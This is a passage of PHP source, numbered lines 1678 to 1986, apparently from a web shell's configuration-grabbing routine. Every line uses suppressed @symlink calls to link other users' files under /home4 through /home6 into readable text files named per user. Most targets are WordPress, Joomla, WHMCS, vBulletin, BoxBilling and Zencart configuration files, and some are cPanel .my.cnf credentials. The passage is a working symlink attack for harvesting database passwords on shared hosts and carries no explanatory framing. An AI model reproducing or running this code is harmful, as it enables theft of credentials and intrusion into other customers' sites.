  1678. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1679. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1680. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1681. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1682. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1683. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1684. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1685. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1686. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1687. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1688. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1689. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1690. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1691. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1692. @symlink('/home4/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1693. @symlink('/home4/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1694.  
  1695. //home5
  1696.  
  1697. @symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1698. @symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1699. @symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1700. @symlink('/home5/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1701. @symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1702. @symlink('/home5/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1703. @symlink('/home5/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1704. @symlink('/home5/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1705. @symlink('/home5/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1706. @symlink('/home5/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1707. @symlink('/home5/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1708. @symlink('/home5/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1709. @symlink('/home5/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1710. @symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1711. @symlink('/home5/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1713. @symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1714. @symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1715. @symlink('/home5/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1716. @symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1717. @symlink('/home5/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1718. @symlink('/home5/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1719. @symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1720. @symlink('/home5/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1721. @symlink('/home5/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1722. @symlink('/home5/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1723. @symlink('/home5/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1724. @symlink('/home5/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1725. @symlink('/home5/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1726. @symlink('/home5/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1727. @symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1728. @symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1729. @symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1730. @symlink('/home5/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1731. @symlink('/home5/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1732. @symlink('/home5/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1733. @symlink('/home5/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1734. @symlink('/home5/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1735. @symlink('/home5/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1736. @symlink('/home5/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1737. @symlink('/home5/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1738. @symlink('/home5/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1739. @symlink('/home5/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1740. @symlink('/home5/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1741. @symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1742. @symlink('/home5/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1743. @symlink('/home5/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home5/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home5/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home5/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home5/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home5/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home5/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home5/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home5/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home5/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home5/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home5/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home5/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home5/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home5/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home5/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home5/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home5/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home5/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home5/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home5/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home5/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home5/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home5/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home5/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home5/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home5/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home5/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home5/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home5/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home5/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home5/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home5/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home5/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home5/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home5/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home5/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home5/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home5/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home5/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home5/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home5/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home5/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home5/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home5/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home5/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home5/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home5/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home5/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home5/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home5/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home5/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home5/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home5/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home5/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home5/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home5/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home5/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home5/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home5/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home5/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home5/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home5/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home5/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home5/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home5/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1825. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1826. @symlink('/home5/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1827. @symlink('/home5/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1828. @symlink('/home5/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1829. @symlink('/home5/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1830. @symlink('/home5/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1831. @symlink('/home5/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1832. @symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1833. @symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1834. @symlink('/home5/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1835. @symlink('/home5/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1836. @symlink('/home5/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home5/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home5/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1839. @symlink('/home5/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1840. @symlink('/home5/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1841. @symlink('/home5/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1842. @symlink('/home5/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1843. @symlink('/home5/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1844. @symlink('/home5/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1845. @symlink('/home5/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1846. @symlink('/home5/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1847. @symlink('/home5/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1848. @symlink('/home5/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1849. @symlink('/home5/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1850. @symlink('/home5/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1851. @symlink('/home5/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1852. @symlink('/home5/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1853. @symlink('/home5/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1854. @symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1855. @symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1856. @symlink('/home5/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1857. @symlink('/home5/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1858. @symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1859. @symlink('/home5/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1860. @symlink('/home5/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home5/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1862. @symlink('/home5/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1863. @symlink('/home5/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1864. @symlink('/home5/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1865. @symlink('/home5/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1866. @symlink('/home5/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1867. @symlink('/home5/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1868. @symlink('/home5/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1869. @symlink('/home5/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1870. @symlink('/home5/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1871. @symlink('/home5/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1872. @symlink('/home5/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1873. @symlink('/home5/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1874. @symlink('/home5/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1875. @symlink('/home5/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1876. @symlink('/home5/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1877. @symlink('/home5/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1878. @symlink('/home5/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1879.  
  1880. //home6
  1881.  
  1882. @symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1883. @symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1884. @symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1885. @symlink('/home6/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1886. @symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1887. @symlink('/home6/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1888. @symlink('/home6/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1889. @symlink('/home6/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1890. @symlink('/home6/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1891. @symlink('/home6/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1892. @symlink('/home6/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1893. @symlink('/home6/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1894. @symlink('/home6/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1895. @symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1896. @symlink('/home6/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1897. @symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1898. @symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1899. @symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1900. @symlink('/home6/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1901. @symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1902. @symlink('/home6/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1903. @symlink('/home6/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1904. @symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1905. @symlink('/home6/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1906. @symlink('/home6/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1907. @symlink('/home6/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1908. @symlink('/home6/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1909. @symlink('/home6/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1910. @symlink('/home6/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1911. @symlink('/home6/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1912. @symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1913. @symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1914. @symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1915. @symlink('/home6/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1916. @symlink('/home6/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1917. @symlink('/home6/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1918. @symlink('/home6/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1919. @symlink('/home6/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1920. @symlink('/home6/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1921. @symlink('/home6/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1922. @symlink('/home6/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1923. @symlink('/home6/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1924. @symlink('/home6/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1925. @symlink('/home6/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1926. @symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1927. @symlink('/home6/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1928. @symlink('/home6/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home6/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home6/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home6/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home6/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home6/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home6/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home6/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home6/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home6/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home6/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home6/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home6/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1945. @symlink('/home6/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1946. @symlink('/home6/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1947. @symlink('/home6/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1948. @symlink('/home6/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1949. @symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1950. @symlink('/home6/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1951. @symlink('/home6/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1952. @symlink('/home6/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home6/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home6/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home6/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home6/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home6/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home6/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home6/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home6/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home6/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home6/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home6/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home6/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home6/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home6/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home6/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home6/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home6/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home6/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home6/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home6/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home6/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home6/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1980. @symlink('/home6/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1981. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1982. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home6/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home6/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home6/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
